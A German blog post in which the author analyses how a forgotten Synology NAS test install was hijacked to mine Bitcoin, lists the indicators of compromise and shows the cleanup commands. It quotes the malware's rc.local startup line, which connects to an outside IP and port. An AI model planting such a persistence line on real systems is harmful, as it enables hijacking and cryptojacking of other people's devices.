Synology Installation spricht -gegen meinen Willen- mit IP 5.104.226.33

chris 23 Jun , 2014 0 Comments Allgemein

Ich habe eine Art Testinstallation in Hyper-V mit Synology DSM 4.1-2668. Und die Verwaltungsports 5000 bzw. 5001 für SSL hatte ich -ebenfalls testweise- nach außen freigegeben. Und dann vergessen. Doof.

Jedenfalls hat sich jemand den Spaß gemacht, solche (alten) Kisten aufzumachen, um dort Bitcoins zu erzeugen (was ungefähr so klug ist, wie das testweise Freigeben und Vergessen einer Portfreigabe, weil wegen der geringen Rechenleistung selbst mit vielen, vielen, vielen NAS-Geräten für den Betreiber nichtmal Bitcoins für eine Kiste Bier hinten rausfallen dürften).

Bekannt wurde die Schadsoftware als PWNED Mitte Februar 2014.

Am Wochenende ist mir meine Synology DSM 4.1-2668 jetzt erneut in die Hände gefallen – und auch die wurde gekapert. Der Prozessmonitor auf der Web-GUI lässt sich nicht starten. Der Befehl top auf dem Secure Shell ergibt hohe Last.

Weil ich „meine“ Version des rootkits nicht im Internet gefunden habe, und auch keinen PWNED Prozess gefunden hatte notiere ich hier die Auffälligkeiten: ohne Anspruch auf Vollständigkeit oder Richtigkeit.

Infiziert wurde ich nach Dateidatum wohl am 25. Mai 2014. Die Bösewichte ersetzten die BusyBox Befehle

/bin/rm
/bin/mv
/bin/ls
/bin/ps

mit eigenen „bösen“ Versionen.

Die Dateien

/usr/syno/synoman/webman/modules/ResourceMonitor/top.cgi
/usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade.cgi
/usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor2.cgi

wurden umbenannt in .top.cgi, .upgrade.cgi und .rsrcmonitor2.cgi. An Stelle der ursprünglichen binären Dateien wurden gleich benannte (und mit more lesbare) scripte eingesetzt.

Der eigentliche Schadcode wird wohl via

#!/bin/sh -e /var/run/shm.pid 5.104.226.33:3344

in der /etc/rc.local gestartet. Das unterscheidet sich von den anderen Infektionen, die ich im Netz finden konnte. 5.104.226.33 steht in Holland und wirkt auf mich wie ein unbenutzter und/oder ungepflegter Linux Server, den irgendwer irgendwann vergessen hat. Eine Domain consistentapp.com liegt wohl darauf – und wenn man z.B. consistentapp.com/hosting/clientarea.php aufruft kann man den Eindruck gewinnen, das hier mal ein hosting Angebot betrieben werden sollte. Naja.

Auf meiner DSM habe ich mit

busybox rm /bin/rm

die „böse“ Version des Befehls gelöscht und dann mit

ln -s busybox /bin/rm

einen link auf die „gute“ BusyBox Version gesetzt. Analog dazu noch

rm /bin/mv
rm /bin/ls
rm /bin/ps

löschen und

ln -s busybox /bin/mv
ln -s busybox /bin/ls
ln -s busybox /bin/ps

verlinken.

Die /etc/rc.local habe ich geleert. .top.cgi, .upgrade.cgi und .rsrcmonitor2.cgi habe ich zurück verschoben. Jetzt ein Neustart – und die Schadsoftware scheint nicht mehr zu laufen. Zumindest bin ich mir für meine Testinstallation sicher genug. Eine echte, produktive Installation müsste man wohl als kompromittiert ansehen.

Synology empfiehlt für „richtige“ NAS Geräte ein Update und hatte den Fehler schnell behoben, soweit ich sehe.

Written By chris